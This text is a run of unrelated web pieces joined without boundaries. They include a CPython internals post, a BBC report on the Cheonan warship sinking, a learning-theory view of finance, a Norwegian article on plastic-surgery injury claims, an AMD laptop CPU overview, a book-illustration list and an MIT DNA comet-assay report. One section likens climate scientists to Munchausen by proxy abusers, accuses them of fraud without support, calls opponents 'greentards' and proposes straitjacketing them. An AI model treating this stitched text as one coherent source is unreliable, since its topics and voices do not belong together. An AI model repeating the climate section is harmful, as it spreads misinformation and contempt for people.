So when we do stuff to a class ( I could use the word type instead of class just as well , but since we use the word ‘ type ’ so much in different context , I ’ll call our type a class for a bit ) , like calling a class , or subtracting a class , or , indeed , setting an attribute on a class , what happens is that the class ’ object ’s ob_type member is dereferenced , finding that the class ’ type is type .
Then the type -> tp_setattro slot is used to do the actual attribute setting .
So a class , like an integer or a list can have its own attribute - setting function .
And the type - specific attribute - setting function ( ./ Objects/typeobject.c : type_setattro , if you did n’t know its name and want to befriend it in Facebook ) calls the very same function that fixup_slot_dispatchers uses to actually do the fixup work ( update_one_slot ) after it has set a new attribute on a class .
Another details sussed out !
This is it as far as our introduction to Python objects is concerned .
I hope you enjoyed the ride and that you ’re still with me .
I have to admit this post was far harder to write than I initially imagined ( and without Antoine Pitrou ‘s and Mark Dickins ‘s jolly help late at night in # python - dev , I might have given up ! ) .
I ’ve left so much out that I ’m appalled : which operand ’s slot is used in binary opcodes ?
what happens in multiple inheritance and all the gory minute details it entails ?
what about this thing called metaclass ?
what about __slots__ and weak references ?
what about the actual implementation of all the built - in objects , how do the dictionary , the list , the set and their friends actually do their functional work ?
And finally , how about this little gem :
>>> a = object ( ) >>> class C( object ) : pass ... >>> b = C( ) >>> a. foo = 5 Traceback ( most recent call last ) : File " < stdin > " , line 1 , in < module > AttributeError : ' object ' object has no attribute ' foo ' >>> b.foo = 5 >>>
How come I can set an arbitrary attribute to b , which is an instance of C , which is a class inheriting object and not changing anything , and yet I ca n’t do the same with a , an instance of that very same object ?
Some wise crackers can say : b has a __dict__ and a does n’t , and that ’s true , but where in Guido ’s name did this new ( and totally non-trivial ! ) functionality come from if I did n’t inherit it ?!
Ha !
I ’m delighted you asked !
The answers are coming , but at another post .
Image caption South Korea 's president has vowed to punish those who carried out the attack
The US has confirmed it will hold naval exercises with South Korea , after a report blamed the North for the sinking of a Southern warship , officials say .
The Pentagon said the joint anti-submarine and other military exercises would start " in the near future " .
South Korean President Lee Myung - bak earlier froze trade with Pyongyang , vowing to punish those who carried out the attack .
North Korea has said it will retaliate for any action taken against it .
The country 's main newspaper called the investigation an " intolerable , grave provocation " .
' Unequivocal support '
South Korea has said it will refer the North to the UN Security Council in response to the sinking of the Cheonan - and the resulting death of 46 sailors - in March .
In a move endorsed by the US , President Lee said in a televised address that Seoul would no longer tolerate " any provocative act by the North and will maintain a principle of proactive deterrence " .
ANALYSIS
The problem is that South Korean economic measures , US condemnation and even possible action at the UN are unlikely to change the mindset in Pyongyang .
China is the only country with any real leverage over North Korea .
Behind the scenes
Beijing is going to be the crucial player if tensions are not to spill out of control .
The weeks ahead are punctuated with opportunities for further tensions - not least a joint US - South Korean anti-submarine exercise .
Pentagon spokesman Bryan Whitman said the decision to start joint naval exercises was " a result of the findings of this recent incident " .
Analysts describe the joint exercises as a statement of US commitment to help Seoul rather than an attempt to intimidate Pyongyang .
US Secretary of State Hillary Clinton said earlier that her country was working hard to avoid an escalation .
After talks in China , she urged countries in the region to contain " the highly precarious situation created by North Korea " .
China - North Korea 's closest trading partner and a permanent member of the Security Council - has urged " restraint " .
Japan said it was contemplating its own sanctions on Pyongyang .
The North depends on South Korea and China for up to 80 % of its trade and 35 % of its GDP .
In 2009 , inter -Korean trade stood at $ 1.68 bn ( £ 1.11 bn ) - 13 % of the North 's GDP .
The measures announced by South Korea included :
Stopping inter-Korean trade
Banning North Korean ships from using South Korean waterways or shortcuts
Resuming " psychological warfare "
Referring the case to the UN Security Council
The BBC's John Sudworth in Seoul says the measures are as tough a response as the South could take short of military action .
ATTACKS BLAMED ON NORTH Jan 1967 - South Korean warship attacked near border , 39 sailors killed
Jan 1968 - presidential palace in Seoul stormed , 71 killed
Oct 1983 - Rangoon hotel used by South Korean president bombed , 21 killed
Nov 1987 - South Korean airliner bombed , 115 killed
Mar 2010 - Cheonan warship attacked , 46 sailors killed South Korea divided over response
How the ship was sunk Timeline : North Korean attacks Q&A : Cheonan sinking
The measures came less than a week after experts from the US , the UK , Australia and Sweden said in a report that a torpedo had hit the Cheonan .
They reported that parts of the torpedo retrieved from the sea floor had lettering that matched a North Korean design .
Pyongyang denies any involvement in the sinking , calling the investigation a " fabrication " and threatening war if sanctions were imposed .
" If [ South Korea ] sets up new tools for psychological warfare such as loudspeakers and leaves slogans for psychological warfare intact , ignoring our demands , we will directly aim and open fire to destroy them , " a statement by the military said on Monday .
" More powerful physical strikes will be taken to eradicate the root of provocation if [ South Korea ] challenges to our fair response , " said a commander , according to official news agency KCNA .
After a major financial crisis , there is much discussion about how finance has become a casino gambling with other ’s money , keeping the winnings , and walking away when the money is lost .
When thinking about financial reform , all the many losers in the above scenario are apt to take the view that this activity should be completely , or nearly completely curtailed .
But , a more thoughtful view is that sometimes there is a real sense in which there are right and wrong decisions , and we as a society would really prefer that the people most likely to make right decisions are making them .
A crucial question then is : “ What is the difference between gambling and rewarding good prediction ? ”
We discussed this before the financial crisis .
The cheat - sheet sketch is that the online learning against an adversary problem , algorithm , and theorems , provide a good mathematical model for thinking about this question .
What I would like to do here is map this onto various types of financial transactions .
The basic mapping is between “ wealth ” and “ weight ” , with the essential idea that you can think of wealth as either money or degree of control over decision making .
The core algorithms start with a “ wealth ” spread over many experts , each of which makes predictions and then has it ’s wealth updated according to a soft exponential of the value of it ’s prediction .
Going Long .
The basic strategy here is to buy low and sell high .
This strategy is not inherently sound from a learning theory point of view , because a single purchased item can sometimes drop to zero value .
Similarly , a single purchased item can sometimes grow radically in value .
Neither of these properties are desirable from the viewpoint of a learning algorithm .
In the zero value case , a good decision maker can be wiped out by one decision , while in the large value case , a lucky decision maker can randomly achieve overwhelming credit .
Nevertheless , there is a sense in which this strategy is compatible .
If each item purchased either doubles or halves in value , the fluctuation in the wealth of a decision maker is analogous to the fluctuation in the relative weight of on an expert in the online learning framework .
… with diversification .
Going long with diversification implies purchasing several items and selling them later .
Adding diversification to the “ Long ” strategy helps it align substantially better with an optimal learning theory strategy .
Single points of failure are avoided , while random fluctuations up in wealth are reduced .
Going Short .
The short strategy is borrowing an item ( typically a stock ) , selling it high , then buying it back low to cover the debt .
It ’s technique used to make money when a stock decreases in value .
This technique was banned for a time during the crisis .
From the perspective of learning theory , short selling is more dangerous than long , because it ’s possible to end up with negative wealth when a stock is sold short , and then it increases in value .
To avoid this , it ’s necessary to have sufficient collateral to cover the short at all times .
If this collateral is at least twice the value when shorting occurs , it ’s hard for participants to become wealthy by luck , because wealth at most doubles .
Diversification is also a potentially useful helper strategy .
Insurance .
Credit Default Swaps are effectively a form of insurance where one party pays another small amounts unless something bad happens , in which case large amounts of money go the other direction .
In the financial crisis , credit default swaps made the crisis viral , as the “ pay up ” clauses triggered , particularly wiping out AIG .
Insurance has the same general problem as short selling — it can result in negative wealth unless there is sufficient collateral .
It also has the same solution .
Clawback .
The basic idea of a “ clawback ” is that when someone fouls up really badly , you extract it from their past paychecks .
As far as I can tell , this sort of clause exists in nearly no contracts , but it ’s a popular proposal in retrospect , particularly for certain AIG employees who destroyed their company .
The driving problem here is that the actual value of a decision is not known for some time , and it ’s misestimated in the short term .
Learning theory suggests that you should apply updates to estimated value as soon as possible to adjust wealth , which would correspond to a potential 100 % clawback clause .
Two things strike me in considering the above .
The first is that for normal people interacting with the financial system a set of financial rules + good sense have developed such that wealth tends to grow and shrink in a manner similar to what learning theory would suggest is near optimal .
For example , most people use the going long strategy by default and most diversify .
Most do n’t use the short strategy , but those that do must have sufficient collateral .
Normal people do n’t have access to credit default swaps , and normal insurance has real collateral requirements .
Clawbacks are automatic , as normal people bet with their own money and take their own losses .
The second is that larger actors have become quite skillful at avoiding the rules , with unsecured credit default swaps , unsecured shorts , and no clawback rules .
But , learning theory is math , so it ca n’t really be avoided — instead what happens is inefficient decision making via inefficient learning algorithms on a societal scale .
My belief is effective financial reform will impose limits on agents just as learning theory implies .
This is also the answer to the title question — it ’s gambling if the corresponding learning algorithm has high regret , and it ’s rewarding good prediction if the corresponding learning algorithm has low regret .
Since this is already done effectively for normal people , shifting all agents towards the limits imposed in that direction works .
This means lower bounds on collateral ( or equivalently upper bounds on leverage ) , and standardized markets where all agents can interact on an equal basis .
Adding in automatic clawback provisions for all performance - based pay would also probably be very effective .
A full dose of this medicine may upset many people directly affected by such legislation , as it limits their actions and imposes downsides .
But this need n’t be so , because the math is straightforward , very robust , and designed precisely to pick out the good decision makers giving them wealth as rapidly as responsibly possible to make and control bigger decisions .
If you are a good decision maker , then you should want this .
On the research front , there are substantial improvements we could hope for .
Some basic questions are : How can we better structure marketplaces to allocate wealth according to the dynamics of an online learning algorithm ?
And what are the holes in the mapping between online learning and markets that need repair ?
And how do you repair them ?
And how do the repairs effect learning algorithms when backported ?
Good answer to this question could be radically valuable .
Yiling and Jenn have a paper mapping out connections between prediction markets and online learning this year at EC , which is of interest for this direction of research .
So I ’ve been animating my butt off ( colloquially , as I still have a fat ass ) for the past few weeks to get a demo reel up and ready , and today I think it ’s just about done !
However , while editing the reel I came up with not one but three different versions , and I ’m not really sure which one to go with .
They ’re not really all that different either , but to me they ’re different enough .
Anyway , I ’d like to ask you guys what you think is the better version .
These are the difference between them :
Version 3 : Original
Version 3a : Different song , and drops the “ magnet pull ” clip at the end
Version 3 b : Same as 3a , but with Jedi Swingers as the ender instead of the opener
Anyway , here they are so you can decide for yourself .
Do help me choose a good one , cos it ’ll be the one I start sending out to studios .
UPDATE : A winner has been chosen !
Based on your votes , I ’ve done up version 3c and you can view it here .
Here you can read the definition of Munchausen by Proxy … I made some changes to reflect what I ’m talking about with respect to global warming fraud , but the basics are there .
Munchausen by proxy syndrome ( MBPS ) is a relatively uncommon condition that involves the exaggeration or fabrication of climate illnesses or symptoms by a primary caretaker ( scientist ) .
One of the most harmful forms of science abuse , MBPS was named after Baron von Munchausen , an 18th - century German dignitary known for telling outlandish stories .
Sound familiar ?
See the the similarities ?
Read on .
In MBPS , an individual — usually a scientist or warmer — deliberately “ makes ” the planet appear sick or convinces others that the planet is sick .
The scientist or warmer misleads others into thinking that the planet has climate problems by lying and reporting fictitious data .
He or she may exaggerate , fabricate , or induce symptoms .
As a result , scientists usually order tests , suggest different types of solutions ( like carbon taxes and other asinine ideas ) , and may even hospitalize the planet or perform surgery like drilling ice cores to determine the cause .
Sound like some warmers and scientists we know ?
Sure does to me .
Typically , the perpetrator feels satisfied by gaining the attention and sympathy of warmers , greentards , and others who come into contact with him or her and the planet .
Some experts believe that it is n’t just the attention that ’s gained from the “ illness ” of the planet that drives this behavior , but also the satisfaction in being able to deceive individuals that they consider to be more important and powerful than themselves .
( Like Obama , Gordon Brown , etc ) .
Because the scientist or warmer appears to be so caring and attentive , often no one suspects any wrongdoing .
A perplexing aspect of the syndrome is the ability of the scientist or warmer to fool and manipulate other scientists and the public .
Frequently , the perpetrator is familiar with the science profession and is very good at fooling the scientists and warmers .
Even the most experienced scientists can miss the meaning of the inconsistencies in the Earth ’s symptoms .
It ’s common for scientists to overlook the possibility of MBPS because it goes against the belief that a scientist or warmer would never deliberately hurt his or her Earth or fellow human beings .
Diagnosis is very difficult , but would involve some of the following : a planet that has multiple climate problems that do n’t respond to treatment or that follow a persistent and puzzling course
physical or laboratory findings that are highly unusual , do n’t correspond with the planet ’s climate history , or are physically or scientifically impossible
a scientist or warmer who is n’t reassured by “ good news ” when test results find no climate problems exists , but continues to believe that the Earth is ill .
Other theories say that Munchausen by proxy syndrome is a cry for help on the part of the scientist or warmer , who may be experiencing anxiety or depression or have feelings of inadequacy .
Some may feel a sense of acknowledgement when the false science confirms their skills .
Or , the scientist or warmer may just enjoy the attention that the sick planet — and , therefore , he or she — gets .
The things that go on with climate “ alarmist ” “ believers ” “ warmers ” and scientist who continue to advocate anthropogenic global warming , or now “ climate change ” is amazingly similar to Munchausen by Proxy Syndrome .
How can it be stopped .
Well here ’s some suggestions .
Most often , Munchausen by proxy syndrome cases are resolved in one of three ways : the perpetrator is apprehended ( Michael Mann vs. The State of Virginia announced today sounds fittingly correct ) .
the perpetrator moves on to a new crisis when the original crisis gets old or the original crisis gets busted ( like we have things popping up on the radar now such as ocean acidification a new problem so they can “ save ” us – not to mention control us , get their 15 minute of fame , plenty of grant money to continue perpetuating the fraud , and tax the snot our of us ) .
the crisis “ dies ” because scientist and warmers finally realize their BS is n’t making and they cease to try to pull the wool over everyone ’s eyes .
Perhaps we ’re wrong by making all the efforts to bust the science by showing everyone the
“ tricks ” , data manipulation , missing data , unfounded science , data from magazines , peer - reviewed papers that are only peer - reviewed by fellow “ warmer ” scientists or non-scientists who happen to agree with their position .
I ’d suggest we’d be better off getting the men in the white coats to grab these guys , put them in straight - jackets , and let the psychiatrists work on them until they admit their problems and get therapy .
Think about it .
What is going on with climategate is eerily similar .
Source : Me
Hei , denne artikkelen er over ett år gammel og kan inneholde utdatert informasjon
|| |( Dagbladet ) : Norsk pasientskadeerstatning ( NPE ) har fattet 304 vedtak innenfor plastikkirurgi i perioden 1988 til og med 2009 , opplyser NPE .
116 av klagerne har fått medhold , 188 har fått avslag .
- Livet mitt rasertCarina ( 35 ) har feilbehandlingssaken sin til vurdering hos Norsk Pasientskadeerstatning ( NPE ) , med bistand fra advokat Edmund Asbøll .
Et mislykket keisersnitt var årsaken til at trebarnsmora fikk utført mageplastikk på et sykehus i Nord - Norge .
Samtidig gjennomgikk hun brystreduksjon , fordi store bryster hadde gitt henne migrene med utspring fra nakken .
- Resultatet er helt grusomt , og jeg har fått store psykiske problemer .
Jeg har ikke klart å jobbe på halvannet år , og tviler på at jeg noen sinne vil klare å komme meg tilbake i full jobb .
De sier jeg har fått posttraumatisk stressyndrom , sier 35 - åringen .
Skadene er blitt vurdert av en spesialist i plastisk kirurgi som skriver at resultatet er « meget utilfredsstillende og langt utenfor det normale » .
- Jeg synes det er viktig at folk som vurderer å la seg operere ser bildene av hvordan jeg ble , før de legger seg under kniven .
Livet mitt er fullstendig rasert , sier Carina .
- Spesialisten påpeker at resultatet er utilfredsstillende og unormalt .
Dette synes derfor å være et alvorlig og klart tilfelle av feilbehandling , sier advokat Edmund Asbøll .
21 mill .
Fra 1 . januar.2009 ble pasientskadeloven utvidet til også å gjelde pasientskader som følge av behandling utført ved private behandlingsinstitusjoner .
PLASTIKKIRURGI :
Over halvparten av pasientene som har søkt erstatning etter feilslått plastikkirurgi mellom 1988 og 2009 har gjennomgått brystoperasjon .
Arkivfoto : Henning Lillegård Vis mer
Denne oversikten fra NPE baserer seg utelukkende på statistikk om vedtak knyttet til behandling i det offentlige helsevesenet .
Andelen medhold innenfor plastikkirurgi er 38 prosent .
Dette er noe høyere enn den generelle medholdsandelen i NPE som er på 35 prosent i samme periode .
- Det er ikke uvanlig at medholdsandelen er både høyere og lavere enn den generelle når vi går inn i saker innenfor avgrensede områder .
En årsak innenfor plastikkirurgisakene kan være at infeksjon er en hyppigere medholdsårsak enn i vår totale saksmengde .
Pasientskadeloven har en særbestemmelse som innebærer at det lettere gis medhold ved infeksjoner enn ved andre typer behandlingsskader , sier assisterende direktør Rolf Gunnar Jørstad i NPE .
Mellom 1988 og utgangen av 2009 er det utbetalt til sammen 21 millioner kroner i erstatning til pasienter som har fått medhold etter plastikkirurgiske inngrep .
I gjennomsnitt er det utbetalt 199 000 kroner per sak .
Den høyeste utbetalingen blant sakene som er ferdig behandlet er på 1,3 millioner kroner .
Saken gjaldt rekonstruksjon av bryst etter kreftbehandling .
Pasienten fikk kroniske smerter som følge av at operasjonsmetoden som ble valgt var uheldig ettersom huden var stråleskadet etter kreftbehandlingen .
Laveste utbetaling er på 6000 kroner .
70 prosent kvinnerDet er totalt 264 kvinner og 40 menn blant erstatningssøkerne .
Godt over halvparten av vedtakene innen plastikkirurgi gjelder brystoperasjoner .
Kvinneandelen er opp i mot 70 prosent , selv når disse operasjonene holdes utenfor .
Generelt er det også flere kvinner enn menn som søker om pasientskadeerstatning .
Kvinneandelen har de siste årene vært nærmere 60 prosent blant erstatningssøkerne som har fått vedtak om medhold eller avslag i NPE .
Gjennomsnittlig alder på skadetidspunktet er 39 år for pasienter som fikk utført plastikkirurgi .
Den yngste pasienten var ett år , den eldste 74 år .
Til sammenlikning var den generelle gjennomsnittsalderen da skaden skjedde 46 år for pasienter som fikk saken sin avgjort mellom 1988 og 2009 , opplyser NPE .
- Generelt sett er gjennomsnittsalderen blant de som krever erstatning fra NPE lavere enn gjennomsnittsalderen vist i statistikk basert på døgnopphold ved sykehus .
Når det gjelder området plastikkirurgi , gjenspeiler nok gjennomsnittsalderen at det også innenfor det offentlige helsevesen trolig er forholdsvis unge pasienter som gjennomgår plastikkirurgiske inngrep , forklarer Jørstad .
MAGEPLASTIKK : Carina ( 35 ) ville fikse på magen etter et mislykket keisersnitt , men det ble bare verre .
Foto : Privat Vis mer
Svikt i behandlingen er årsak til medhold i 57 prosent av plastikkirurgisakene .
Infeksjon er nest hyppigste medholdsårsak med en andel på 30 prosent .
Infeksjon utgjør bare en andel på 15 prosent av medholdsvedtakene sett under ett .
Dette utgjør alts å en vesentlig mindre andel enn innenfor plastikkirurgi .
AvslagsårsakerI avslagssakene har 60 prosent av erstatningssøkerne fått avslag fordi det ikke foreligger svikt i behandlingen .
Det vil si at behandlingen sannsynligvis er årsak til skaden , men skaden er innenfor en risiko ved behandlingen som pasienten må akseptere .
Dette dreier seg om komplikasjoner som kan inntreffe relativt hyppig , og som det er kjent kan inntreffe selv ved korrekt behandling , opplyser NPE .
Ikke sannsynlig sammenheng mellom behandlingen og skaden er begrunnelsen for avslag i 30 prosent av sakene .
De øvrige årsakene til avslag er at det økonomiske tapet er under 5000 kroner ( dekkes ikke etter pasientskadeloven ) eller at smitten eller infeksjonen som oppstod i hovedsak skyldes pasientens tilstand eller sykdom .
Pasienten skal gjennom erstatningen få dekket inntektstap og utgifter som følge av behandlingsskaden .
Er skaden varig og pasienten har fått en medisinsk invaliditet på over 15 prosent , har pasienten også rett på menerstatning .
Brystreduksjon
Brystreduserende kirurgi utgjør den største andelen av vedtakene innenfor plastikkirurgi , med 37 prosent ( 112 saker ) .
Pasientene har fått redusert størrelsen på brystene på bakgrunn av nakke- og ryggplager .
De 51 pasientene som fikk medhold etter brystreduksjoner hadde følgende skader :
Den hyppigste skadetypen er lokal infeksjon med 32 registreringer .
En del av disse pasientene utviklet vevsdød i ettertid .
Komplikasjonene førte til forlenget sykdomsforløp og reoperasjoner , og hos flere dessuten et dårlig kosmetisk resultat .
Den nest hyppigste skadetypen , med ni registreringer , er lokal vevsskade og / eller vevsdød .
Ikke fullgod operasjonsteknikk resulterte i at det utviklet seg vevsdød , eller brystet fikk en avvikende form .
En av pasientene ble før operasjonen ikke informert om risikoen ved røyking i forbindelse med kirurgiske inngrep , noe som bidro til nedsatt blodsirkulasjon og utvikling av vevsdød .
Klagestatistikken Brystreduksjon : 112 saker .
Medhold : 51 saker .
Avslag : 61 saker .
Mageplastikk : 64 saker .
Medhold : 20 saker .
Avslag : 44 saker .
Rekonstruksjon av bryst : 55 saker .
Medhold : 22 saker .
Avslag : 33 saker .
Brann - og etseskader : 16 saker .
Medhold : 8 saker .
Avslag : 8 saker .
Arrkorreksjoner : 14 saker .
Medhold : 5 saker .
Avslag : 9 saker .
Hudtransolantasjoner : 9 saker .
Medhold : 3 saker .
Avslag : 6 saker .
Nesekirurgi : 9 saker .
Medhold : 0 saker .
Avslag : 9 saker .
Annet : 25 saker .
Medhold : 7 saker .
Avslag : 18 saker .
Kilde : Norsk pasientskadeerstatning
De øvrige skadene er feilplassering av brystvorter , fjerning av for mye vev slik at brystene ble asymmetriske , ikke korrekt utført sårrevisjon og trykkskade i armen som følge av leiringen på operasjonsbordet .
It 's no secret that AMD has fallen well behind Intel in the mobile CPU space , but it intends to make up major ground by launching its first Phenom triple - core and quad - core processors for laptops .
There will be new dual - core and single - core CPUs as well .
Last year kicked off AMD 's rebranding strategy , one that has helped divert attention away from parts and frequency numbers and focus instead on the user experience .
It 's called , and the term is separated into four tiers , each corresponding to a market segment , namely : budget , mainstream , home - theater , and enthusiast PCs .
On Tuesday , AMD extended the Vision brand to include a new family of mobile processors .
It 's no secret that AMD has fallen well behind Intel in the mobile CPU space , but it intends to make up major ground by launching its first Phenom triple - core and quad - core processors for laptops .
There will be new dual - core and single - core CPUs as well , continuing the Turion and Athlon brands , only they 're followed by the number " II . "
Like Intel 's newest Core processors , AMD has updated its mobile platform with a host of new advanced technologies , including DDR3 memory ( up from DDR2 ) , a faster HyperTransport 3 , support for Direct X 11 , and improvements in battery life .
Most compelling of all , you 'll see AMD's Phenom processors in laptops as small as 13 inches .
Technology breakdown
It has been a while since AMD updated an entire mobile platform , which is n't only the processor , but everything around it .
Upcoming AMD processors will be accompanied by DDR3 memory now , instead of DDR2  a move that Intel had made early last year .
Most AMD - based laptops will trend toward 4GB ; AMD says the platform can support more than 4GB , but it 'll be up to the OEM .
Remember that AMD always had its memory controller onboard the processor package , essentially never having such features as a Front Side Bus ( FSB ) or a north bridge .
Intel , on the other hand , recently removed the FSB from its Core processors .
Today , AMD 's HyperTransport 3 will continue that tradition with its optimized memory controller by cranking memory controller speeds from 800MHz to 1.6GHz .
Certain advanced technologies still give
Intel the upper hand , though .
For instance , AMD's TurboCore technology the equivalent of Intel 's " turbo boost " which is available in its desktop , wo n't be available with this mobile processor release .
Like Intel 's turbo boost , TurboCore under - clocks inactive cores while boosting performance of the ones that are active , sending a burst of speed to the processor .
And the Intel concept of hyperthreading , or virtual cores , does n't exist in AMD processors .
AMD 's rationalization is that having more physical cores are better than virtual ones , which is why you 'll see triple - and quad - core solutions in thin and light laptops .
More physical cores also translate to higher thermals , though , so we 'll see how the battery life scenario plays out .
Vision takes into account several hardware factors , including processor and graphics performance while hitting a particular price .
With graphics performance , AMD has maintained support for Direct X 11 ( discrete graphics only ) in its new platform .
You will also see more laptops with switching graphics , or the ability to switch from discrete to integrated graphics ( and vice versa ) based on graphics demand .
Vision platform 
A breakdown
In stores , you wo n't see laptop stickers that have AMD processor and graphics card model numbers .
The way you buy an AMD laptop is based on what day - to - day tasks can be performed on it , broken down into tiers : Vision Basic , Vision Premium , Vision Ultimate , and Vision Black .
Vision Basic covers laptops in the sub -$ 500 price range and could even include netbooks .
The minimum requirement is an AMD Athlon II X2 Neo or Turion II X2 Neo branded processor and an entry level ATI graphics chip ( the 4200 series ) .
Performance creeps up a bit with Vision Premium , with all the processors in this tier maxed out at a dual - core level .
For instance , an AMD laptop with the upcoming 1.7GHz Turion II Neo X2 K665 CPU , 4GB of DDR3 memory , and a midrange ATI discrete graphics card falls under the Vision Premium brand .
The new Phenom processors will have a dual - core variant as well :
An AMD laptop with the 2.8GHz dual - core Phenom II X620 , 4GB of DDR3 memory , and a midrange graphics card will also be seen under this brand .
Expect battery life improvement with this revamp .
AMD claims that its dual - core laptops can last up to 7 hours .
Vision Ultimate is intended for advanced users : video editors , professional photographers , and part time gamers .
This is the tier where the new Phenom II triple - and quad - core processors will begin their journey .
An example of an Ultimate branded laptop is one that will be equipped with the 2GHz quad - core Phenom II N930 , 4GB of DDR3 memory , and the ATI Mobility Radeon 5650 graphics card .
And believe it or not , these parts will reside in an AMD - based laptop with a 14 - inch widescreen display .
Vision Black represents the top of the heap , as it parts are aimed at hardcore performance enthusiasts .
One of the most compelling features in this tier is its overclocking ability , as these Phenom II processors are unlocked .
In terms of speed , the Intel Core i7-920XM
Extreme Edition should have nothing to worry about , but the quad - core Phenom II X920 X4 ( 2.3GHz ) will be very attractive from a pricing standpoint .
A Vision Black system , for instance , may also include 4GB of DDR3 memory and an ATI Mobility Radeon 5850 graphics card .
As with Ultimate , you 'll see the " Vision Black " stickers in thin and light form factors .
At least 26 new ultra thin laptops are being introduced ( a 30 percent increase from last year , according to AMD .
And that 's good news for cost - conscious power users .
Book Illustrations
The Nuremberg Chronicle ( Liber Chronicarum ) , by Hartmann Schedel , published 1493
( Thanks to : Jheka . )
Alchoran , das ist des Mahometischen Gesatzbuchs und Türckischen Aberglaubens Ynnhalt und Ablänung , by Dionysius Cartusianus , published 1540
( Thanks to : Martin . )
Histoire générale de la religion des turcs , by Michel Baudier , published 1625
( Thanks to : Kilgore Trout and Raafat . )
Historie , Van den Oorsprongh , Geslacht , Geboorte , Opvoedinge , en Leere des grooten valschen Propheets Mahomets , by Broer Jansz , published 1640
( Thanks to : Martin H. )
A True and Faithful Relation of What Passed for Many Yeers Between Dr. John Dee and Some Spirits , by Meric Casaubon , published 1659
( Thanks to : Merav T. )
Mahomets und Türcken Grewel , by David Schuster , published 1664
( Thanks to : Kilgore Trout . )
L'Alcoran de Mahomet , Traduit d'Arabe en François , Par le Sieur du Ryer , Sieur de la Garde Malezair , by Sieur du Ryer , published 1683
( Thanks to : Martin . )
Pahsebeia , or A View of all Religions in the World , by Alexander Ross , published 1683
Description de l'Univers , by Alain Manesson Mallet , published 1683
Description de l'Univers , by Alain Manesson Mallet , published 1685
Description de l'Univers , by Alain Manesson Mallet , published 1700 ( ? )
Description de l'Univers , by Alain Manesson Mallet , published 1719
( Thanks to : F. P. )
Mahomets Alkoran , by Jan Hendriksz Glazemaker , published 1696
La Vie de Mahomet , by M. Prideaux , published 1699
( Thanks to : Andy B. )
The Life of Mahomet , by A. du Ryer , published 1719
L'Alcoran de Mahomet , Traduit de l'arabe par André du Ryer , sieur de la Garde Malezair , avec la traduction des observations historiques & critiques sur le mahométisme , mises à la tête de la Version anglaise de M. George Sale , by the Sieur Du Ryer , published 1775
The History of the Arabs , Including the Life of Mohammed , by William Mavor , published 1804
( Thanks to : little old lady . )
Kurze und fassliche Beschreibung der Lebensgeschichte meines Herrn Vetters , by Peter Felber , published 1839
( Thanks to : Martin H. )
The History of the Saracens : Lives of Mohammed and His Successors , by Simon Ockley , published 1848
( Thanks to : Mrs. $ hakespeare . )
Mahomet and His Successors , by Washington Irving , published 1869
The life of Mohammed ; founder of the religion of Islam , and of the empire of the Saracens , by George Bush , published 1831 / 1900 / 2004
( Thanks to : Martin H. )
Rubaiyat of Omar Khayyam , by Omar Khayyam , Edward Fitzgerald and Edmund Dulac , published 1909
( Thanks to : Caspar W. )
The Outline of History , Volume II , by G.H. Wells , published 1920
Koran , published 1932
El Coran , by Mahoma , published 1979
Ansaar 's Guide Through the Scriptures for Better Living , by Ansaar / Original Tents of Kedar , published 1988
( Thanks to : Raafat . )
Der Harem des Propheten : Aus dem Liebesleben eines Religionsstifters , by Johann G Mausinger , published 2004
( Thanks to : Martin . )
Meg 's Absolutely Wonderful Tremendous Fantastic Day / The Deafening Silence , by James O'Neill , published 2005
ILLUSTRATIONS FROM UNKNOWN BOOKS
( Thanks to : Raafat . )
( Thanks to : Martin . )
Coco Sumner is back from her work with Sub Focus and Robyn , this time choosing to team up with Fyfe Dangerfield ( of the Guillemots ) , whose popularity has recently exploded , thanks to his feature on an expertly crafted advert from John Lewis .
They have decided to cover the Neil Young classic Only Love Can Break Your Heart , which is a toughie .
Big respect to Fyfe though , people said that the cover of Billy Joel ’s She ’s Always A Woman would be a letdown , but he did a really good job of it in then end .
I ’ll let you guys decide if he managed to make it two in a row though .
While also known as Protest Dog , some of his fans on the internet call him Kanellos , while others refer to him as Louk , after the type of sausage he apparently likes to eat .
Our DNA is under constant attack from many sources : Radiation , ultraviolet light , and contaminants in our food and in our environment can all wreak havoc on our genetic material , potentially leading to cancer and other diseases .
Analyzing DNA damage is critical to understanding those diseases , as well as seeking new treatments , but current tools for detecting DNA damage make for tedious and time - consuming work .
Now a team of MIT bioengineers has devised a new way to rapidly reveal DNA damage under a variety of conditions , promising to make such analysis a routine aspect of applications such as drug screening and epidemiological studies of the effects of environmental agents .
The new technique is based on a 30 - year - old test known as the “ comet assay ” — named for the comet - shaped smear that the damaged DNA forms during the test .
However , the new technology can analyze a much greater number of cells , at a much faster rate , than the traditional comet assay .
The technology , the result of a collaboration between researchers in the Harvard - MIT Division of Health Sciences and Technology ( HST ) and MIT ’s Department of Biological Engineering , could offer a new approach for epidemiologists to detect dangerous environmental exposures long before they cause cancer , for clinicians to provide better cancer treatment and for researchers in the pharmaceutical industry to identify new drugs and screen out hazardous drugs .
“ We expect this could enable studies on a scale that has n’t been possible before , ” says David Wood , a postdoctoral fellow in HST who is lead author of a paper being published in this week ’s Proceedings of the National Academy of Sciences that describes the new technique .
Wood worked closely on the project with David Weingeist , graduate student in the Department of Biological Engineering .
“ A critical feature of our technology is that it can be used to detect genotoxic [ mutation - causing ] agents in the environment , even if only very basic research equipment is available , ” says Bevin Engelward , associate professor of biological engineering and co-senior author of the paper with Sangeeta Bhatia , professor of HST and electrical engineering and computer science and member of the David H. Koch Institute for Integrative Cancer Research and Howard Hughes Medical Institute .
“ Enabling the prevention of genotoxic exposures in developing nations could ultimately improve the health of millions , ” she added .
Chasing comets
The comet assay is based on gel electrophoresis , a commonly used lab test in which an electric field is applied to DNA placed on a slab of polymer gel , forcing the DNA to move across the gel .
During electrophoresis , damaged DNA travels farther than undamaged DNA , producing a comet - shaped smear .
( The damaged DNA forms the “ tail ” of the comet . )
This test is generally considered very sensitive , but is also quite laborious .
Each experimental condition ( for example , a test of how a particular drug affects DNA ) requires its own microscope slide , and each slide ( containing hundreds of cells ) must be visually inspected by the researcher .
This limits the number of experimental conditions that can be studied .
To create the new test platform , the researchers from the Bhatia and Engelward laboratories developed the concept of microwells printed into the electrophoresis gel .
Using a micropatterning technique developed by Wood and Bhatia , a grid of thousands of tiny indentations is created on the gel .
Each cell is placed in its own indentation , giving it an “ address ” that stays constant throughout the process .
Furthermore , each gel can be subdivided into distinct environments by placing a 96 - well plate over the gel .
Each well confines about a thousand cells , allowing the researchers to add different drugs or other chemicals to each well to compare their effects on DNA damage and repair .
This setup allows dozens of experimental conditions to be tested on just one slide , and it enables slides to be automatically analyzed using custom - designed imaging software .
